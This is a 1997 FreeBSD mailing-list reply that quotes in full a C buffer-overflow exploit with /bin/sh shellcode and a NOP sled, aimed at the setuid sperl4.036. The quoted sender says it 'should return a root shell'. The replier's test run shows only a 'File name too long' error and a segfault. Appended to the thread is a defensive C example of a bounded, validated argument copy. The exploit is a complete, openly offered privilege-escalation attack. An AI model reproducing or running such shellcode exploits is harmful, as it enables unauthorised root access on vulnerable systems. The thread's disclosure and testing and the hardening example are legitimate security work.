Date: Wed, 6 Aug 1997 10:01:08 +0930 (CST)
From: Greg Lehey <grog@lemis.com>
To: lenzi@bsi.com.br (Lenzi, Sergio)
Cc: hackers@FreeBSD.ORG
Subject: Re: Security hole script.
Message-ID: <199708060031.KAA00549@freebie.lemis.com>
In-Reply-To: <Pine.BSF.3.96.970804100920.6279A-100000@sergio> from "Lenzi, Sergio" at "Aug 4, 97 10:12:18 am"
Lenzi, Sergio writes:
>
>
> Hello all.
>
> Here is the "script" that opens a hole in our FreeBSD 2.2.2...
>
> from a friend of mine (lgarcia@netlan.com.br)
> ---------------------------cut-------------------------------
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
>
> #define BUFFER_SIZE 1400
> #define OFFSET 600
>
> char *get_esp(void) {
>     asm("movl %esp,%eax");
> }
> char buf[BUFFER_SIZE];
>
> main(int argc, char *argv[])
> {
>     int i;
>     char execshell[] =
>         "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
>         "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
>         "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
>         "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
>
>     for(i=0+1;i<BUFFER_SIZE-4;i+=4)
>         *(char **)&buf[i] = get_esp() - OFFSET;
>
>     memset(buf,0x90,768+1);
>     memcpy(&buf[768+1],execshell,strlen(execshell));
>
>     buf[BUFFER_SIZE-1]=0;
>
>     execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
> }
>
> ---------------------------------------------------------cut---------
>
> install this script, do a make and run it.
>
> should return a root shell.
=== grog@freebie (/dev/ttyp1) ~/src 2 -> make crackopen
gcc -g -Wall crackopen.c -lm -o crackopen
crackopen.c: In function `get_esp':
crackopen.c:10: warning: control reaches end of non-void function
crackopen.c: At top level:
crackopen.c:14: warning: return-type defaults to `int'
crackopen.c: In function `main':
crackopen.c:25: warning: implicit declaration of function `memset'
crackopen.c:31: warning: control reaches end of non-void function
=== grog@freebie (/dev/ttyp1) ~/src 3 -> crackopen
Can't open perl script "ë#^^ 1ÒVVVV1À°;N ÊRQSPëèØÿÿÿ/bin/sh4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï": File name too long
Segmentation fault
=== grog@freebie (/dev/ttyp1) ~/src 4 ->

I presume this means that mine isn't vulnerable.

Greg
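A defender's view of the bug class behind the quoted program, added here as an example that is code from neither message nor from perl itself: a setuid interpreter that copies its script-name argument into a fixed buffer with no bound is exactly what a 1400-byte argv[] of NOPs and repeated return addresses targets. The bounded version below refuses an argument that does not fit with -ENAMETOOLONG (the errno behind the "File name too long" message in the session above) and refuses an argument carrying bytes that no legitimate path contains with -EINVAL. SCRIPT_NAME_MAX, the function names and the demo_* inputs are this example's own assumptions.

```c
/*
 * Added example, not from the original thread: the unbounded argv[] copy
 * that a stack-overflow exploit relies on, beside the bounded replacement a
 * privileged program should use. SCRIPT_NAME_MAX and all names here are
 * assumptions for the demonstration, not sperl's code.
 */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define SCRIPT_NAME_MAX 256   /* assumed fixed buffer size for the example */

/* Unsafe pattern: copies the argument with no length check, so any argument
 * of SCRIPT_NAME_MAX bytes or more writes past dst. Kept only for contrast;
 * it is never called in this example. */
void script_name_unsafe(char *dst, const char *arg)
{
    strcpy(dst, arg);   /* overflows dst when strlen(arg) >= SCRIPT_NAME_MAX */
}

/* Hardened replacement. Returns 0 and fills dst on success, otherwise a
 * negative errno value:
 *   -ENAMETOOLONG  the argument does not fit in dst (the check is done with
 *                  strnlen so an unterminated argument is never scanned past
 *                  the buffer size)
 *   -EINVAL        empty argument, or a byte outside printable ASCII, which
 *                  a real script path never carries
 */
int script_name_checked(char *dst, size_t dstsz, const char *arg)
{
    size_t n;

    if (arg == NULL || dstsz == 0)
        return -EINVAL;
    n = strnlen(arg, dstsz);
    if (n == 0)
        return -EINVAL;
    if (n >= dstsz)
        return -ENAMETOOLONG;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (c < 0x20 || c > 0x7e)
            return -EINVAL;
    }
    memcpy(dst, arg, n + 1);    /* n < dstsz, so the terminator fits */
    return 0;
}

/* Constructed inputs for the demonstration. */

/* An ordinary script path: accepted. */
int demo_good_name(void)
{
    char dst[SCRIPT_NAME_MAX];
    return script_name_checked(dst, sizeof dst, "/usr/local/bin/report.pl");
}

/* 1400 bytes of 0x90, the size and fill byte of the buffer in the quoted
 * program: rejected on length before any byte is inspected. */
int demo_oversized_name(void)
{
    char arg[1400 + 1];
    char dst[SCRIPT_NAME_MAX];
    memset(arg, 0x90, 1400);
    arg[1400] = '\0';
    return script_name_checked(dst, sizeof dst, arg);
}

/* Short enough to fit, but with a non-printable byte in the middle:
 * rejected on content. */
int demo_binary_name(void)
{
    char dst[SCRIPT_NAME_MAX];
    return script_name_checked(dst, sizeof dst, "/tmp/x\x90.pl");
}

int main(void)
{
    printf("good name      -> %d\n", demo_good_name());
    printf("oversized name -> %d (expect %d)\n", demo_oversized_name(), -ENAMETOOLONG);
    printf("binary name    -> %d (expect %d)\n", demo_binary_name(), -EINVAL);
    return 0;
}
```

The length check runs before the content check so that an oversized argument is never walked byte by byte, and the rejection reasons are distinct errno values so a caller in a privileged program can log which check fired rather than silently truncating the name.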
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199708060031.KAA00549>